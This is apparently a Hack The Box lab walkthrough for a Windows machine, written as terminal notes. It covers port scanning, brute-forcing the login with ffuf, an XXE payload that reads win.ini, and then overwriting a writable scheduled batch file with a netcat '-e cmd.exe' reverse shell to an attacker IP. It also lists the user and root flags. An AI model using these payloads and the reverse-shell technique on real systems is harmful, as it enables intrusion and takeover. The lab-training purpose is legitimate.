root@htb:~$sudonmap-sV-sC-T4{targetIP}-p-PORTSTATESERVICEVERSION22/tcpopensshOpenSSHfor_Windows_8.1 (protocol 2.0)|ssh-hostkey:|30729f:a0:f7:8c:c6:e2:a4:bd:71:87:68:82:3e:5d:b7:9f (RSA)|25690:7d:96:a9:6e:9e:4d:40:94:e7:bb:55:eb:b3:0b:97 (ECDSA)|_256f9:10:eb:76:d4:6d:4f:3e:17:f3:93:d6:0b:8c:4b:81 (ED25519)80/tcpopenhttpApachehttpd2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)|_http-server-header:Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28|_http-title:MegaShopping|http-cookie-flags:|/:|PHPSESSID:|_httponlyflagnotset443/tcpopenssl/httpApachehttpd2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)|_ssl-date:TLSrandomnessdoesnotrepresenttime|ssl-cert:Subject:commonName=localhost|Notvalidbefore:2009-11-10T23:48:47|_Notvalidafter:2019-11-08T23:48:47|_http-server-header:Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28|tls-alpn:|_http/1.1|http-cookie-flags:|/:|PHPSESSID:|_httponlyflagnotset|_http-title:MegaShopping*Typically'-sV'isusedwithNmaptodetermineversions,butthat's not always enough. - adding the -sC is another good way to determine service versions - the -sC option will run safe scripts which are designed to provide useful information without being too intrusive or causing harm to the target systems. * the -SC runs the default set of Nmap scripts (NSE scripts), which typically include scripts for service enumeration, version detection, and other basic checks. * use the -Pn option of Nmap when ICMP packets are blocked by the Windows firewall - the -PN option treats all hosts as online and will skip host discovery
VULNERABILITY SCANNING
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 22,6789,8080,8443,8843,8880
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-trace: TRACE is enabled
| http-enum:
|_ /icons/: Potentially interesting folder w/ directory listing
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.140.205
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.129.140.205:80/
| Form id:
|_ Form action:
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
443/tcp open https
|_http-trace: TRACE is enabled
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-cookie-flags:
| /:
| PHPSESSID:
| secure flag not set and HTTPS in use
|_ httponly flag not set
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.140.205
| Found the following possible CSRF vulnerabilities:
|
| Path: https://10.129.140.205:443/
| Form id:
|_ Form action:
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: RFC2409/Oakley Group 2
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
| http-enum:
|_ /icons/: Potentially interesting folder w/ directory listing
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
* the --script=vuln will run scripts that focus specifically on detecting known
vulnerabilities in the service running on port 6379
- e.g., weak configurations, or known vulnerabilities in the redis service
- if no results are found then the service may be fully patched!
#brute force login page
root@htb:~$ find / -iname usernames 2>/dev/null
/usr/share/seclists/Usernames
root@htb:~$ ls
top-usernames-shortlist.txt
root@htb:~$ cp /usr/share/seclists/Usernames/top-usernames-shortlist.txt .
root@htb:~$ find / -iname passwords 2>/dev/null
/usr/share/seclists/Passwords
root@htb:~$ ls
500-worst-passwords.txt
root@htb:~$ cp /usr/share/seclists/Passwords/500-worst-passwords.txt .
#retrieve site parameters
root@htb:~$ burpsuite
BURP > Proxy > BROWSER
URL: 10.129.140.205
- Forward requests until the full page is loaded
BURP > BROWSER > http://10.129.140.205
Welcome ...
Username: admin
Password: pass
BURP > Proxy > BROWSER
Requests
...
PPOST / HTTP/1.1
Host: 10.129.140.205
Content-Length: 28
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://10.129.140.205
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.129.140.205/
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=r6m4ghtpl8mo8atrkkig8na2kk
Connection: keep-alive
username=admin&password=pass
right-click on the "request" section > copy to file
Filename: requests.txt
File Type: All Files
root@htb:~$ nano requests.txt
...
username=unameFUZZ&password=passFUZZ
j_username=unameFUZZ&j_password=pwFUZZ&from=%2F&Submit=Sign+in
* add the {FUZZ} markers to the username/password section
root@htb:~$ fuf -request requests.txt -request-proto http -mode clusterbomb -w top-usernames-shortlist.txt:unameFUZZ -w 500-worst-passwords.txt:passFUZZ -c -fr "Wrong Credentials" -r
[Status: 200, Size: 3149, Words: 1177, Lines: 97, Duration: 15ms]
* passFUZZ: password
* unameFUZZ: admin
:: Progress: [8483/8483] :: Job [1/1] :: 263 req/sec :: Duration: [0:00:29] :: Errors: 0 ::
* ensure the value username and password value matches in both ffuf and reqests.txt
* ffuf's default mode is pitchfork matching
- this is where the wordlist is matched line by line
- ffuf can simulate Burp Suite's clusterbomb style through the use of
recursion with multiple -w flags or with -request-proto or custom-made
requests using -request.
- clusterbomb combines all permutations of multiple payload positions
similar to a nested loop of each payload set.
* the -c flag outputs the result in color
* the -r flag follows HTTP redirects during fuzzing
* the -fs flag filters results based on content size
* the -fr flag filters results based on a regex pattern.
#identify potential vulnerable entry points
root@htb:~$ BROWSER > http://10.129.140.205/
username: admin
password: password
* identified orders and contact pages
- the input fields in these pages may be vulnerable
#code review
root@htb:~$ BROWSER > {targetSite:port} > Order > CTRL + U
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Goods & Services</title>
<!-- Modified by Daniel : UI-Fix-9092-->
...
* identified a potential username...daniel
#understand input functions with burp proxy
#analyze intercepted data to see what potential vulns exists
BURP > BROWSER > http://10.129.140.205 > Order
Type of Goods: default
Quantity: 1
Address: test
* http://10.129.140.205/services.php
...
Request
POST /process.php HTTP/1.1
Host: 10.129.140.205
Content-Length: 111
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Content-Type: text/xml
Accept: */*
Origin: http://10.129.140.205
Referer: http://10.129.140.205/services.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=r6m4ghtpl8mo8atrkkig8na2kk
Connection: keep-alive
<?xml version = "1.0"?>
<order>
<quantity>1</quantity>
<item>Home Appliances</item>
<address>test</address>
</order>
#search for xml exploit
root@htb:~$ BROWSER > https://www.google.com/
search: xml expoitation hacktricks
https://book.hacktricks.wiki/en/pentesting-web/xxe-xee-xml-external-entity.html
#test an xml expoit's validity
BURP > Request > Repeater
Request
...
POST /process.php HTTP/1.1
Host: 10.129.140.205
Content-Length: 111
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Content-Type: text/xml
Accept: */*
Origin: http://10.129.140.205
Referer: http://10.129.140.205/services.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=r6m4ghtpl8mo8atrkkig8na2kk
Connection: keep-alive
<?xml version = "1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/win.ini'>]>
<order>
<quantity>1</quantity>
<item>&test;</item>
<address>test</address>
</order>
Response
...
HTTP/1.1 200 OK
Date: Sat, 10 May 2025 20:58:28 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28
X-Powered-By: PHP/7.2.28
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 144
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Your order for ; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[Ports]
COM1:=9600,n,8,1
has been processed
* xml entity vulnerability validated
#
daniel@MARKUP C:\Users\daniel> dir Desktop
Volume in drive C has no label.
Volume Serial Number is BA76-B4E3
Directory of C:\Users\daniel\Desktop
03/05/2020 07:18 AM 35 user.txt
daniel@MARKUP C:\Users\daniel> type Desktop\user.txt
032d2fc8952a8c24e39c8f0ee9918ef7
#privesc
#check current privileges
daniel@MARKUP C:\Users\daniel> whoami /priv
Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
* nothing pertinent
daniel@MARKUP C:\Users\daniel> dir c:\
Volume in drive C has no label.
Volume Serial Number is BA76-B4E3
Directory of c:\
03/12/2020 03:56 AM <DIR> Log-Management
07/28/2021 03:38 AM 0 Recovery.txt
* these are the only two UNCOMMON files
- always analyze UNCOMMON files prior to going into a rabbit hole
daniel@MARKUP C:\Users\daniel> type c:\Recovery.txt
blank file
daniel@MARKUP C:\Users\daniel> dir c:\Log-Management
Volume in drive C has no label.
Volume Serial Number is BA76-B4E3
Directory of c:\Log-Management
03/06/2020 02:42 AM 346 job.bat
daniel@MARKUP C:\Users\daniel> type c:\Log-Management\job.bat
@echo off
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo.
echo Event Logs have been cleared!
goto theEnd
:do_clear
wevtutil.exe cl %1
goto :eof
:noAdmin
echo You must run this script as an Administrator!
:theEnd
exit
* understand the purpose of the batch file and what can be manipulated
#view file permission
daniel@MARKUP C:\Users\daniel> icacls c:\Log-Management\job.bat
c:\Log-Management\job.bat BUILTIN\Users:(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
* the wevtutil is used to interact with the Windows Event Log service
- it can retrieve information about event logs and publishers and can
also install and uninstall event manifests, run queries and
export, archive and clear logs
- the el (enumerate logs) parameter lists all event logs currently available
on the system
- the cl (clear log) clears the specified event log.
* the icacls cmd is used to view, modify, back up, and restore NTFS file
and folder permissions (Access Control Lists, or ACLs).
- it’s the modern replacement for older tools like cacls and xcacls.
* the group BUILTIN\Users has full control (F) over the file. The BUILTIN\Users
group represents all local users
- this includes the user Daniel
#use the batch script to execute the transferred netcat IOT execute a reverse shell
daniel@MARKUP C:\Users\daniel>tasklist /V
ERROR: Access denied
daniel@MARKUP C:\Users\daniel>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\daniel> get-process
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
31 5 736 2068 1824 1 wevtutil
root@htb:~$ wget https://github.com/rahuldottech/netcat-for-windows/releases/download/1.12/nc64.exe
2025-05-10 21:42:31 (105 MB/s) - ‘nc64.exe’ saved [45272/45272]
root@htb:~$ python3 -m http.server 8081
PS C:\Users\daniel> wget http://10.10.14.215:8081/nc64.exe -OutFile nc64.exe
PS C:\Users\daniel> cmd
daniel@MARKUP C:\Users\daniel> cd c:\Log-Management
daniel@MARKUP c:\Log-Management>copy c:\users\daniel\nc64.exe c:\Log-Management
1 file(s) copied.
daniel@MARKUP C:\Users\daniel> echo C:\Log-Management\nc64.exe -e cmd.exe 10.10.14.215 4321 > C:\Log-Management\job.bat
* DO NOT enclosed the values in quotes!
daniel@MARKUP c:\Log-Management>type job.bat
C:\Log-Management\nc64.exe -e cmd.exe 10.10.14.215 4321
root@htb:~$ nc -nlvp 4321
...
* wait for the script to execute
root@htb:~$ nc...
listening on [any] 4321 ...
connect to [10.10.14.215] from (UNKNOWN) [10.129.24.24] 49686
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
f574a3e7650cebd8c39784299cb570f8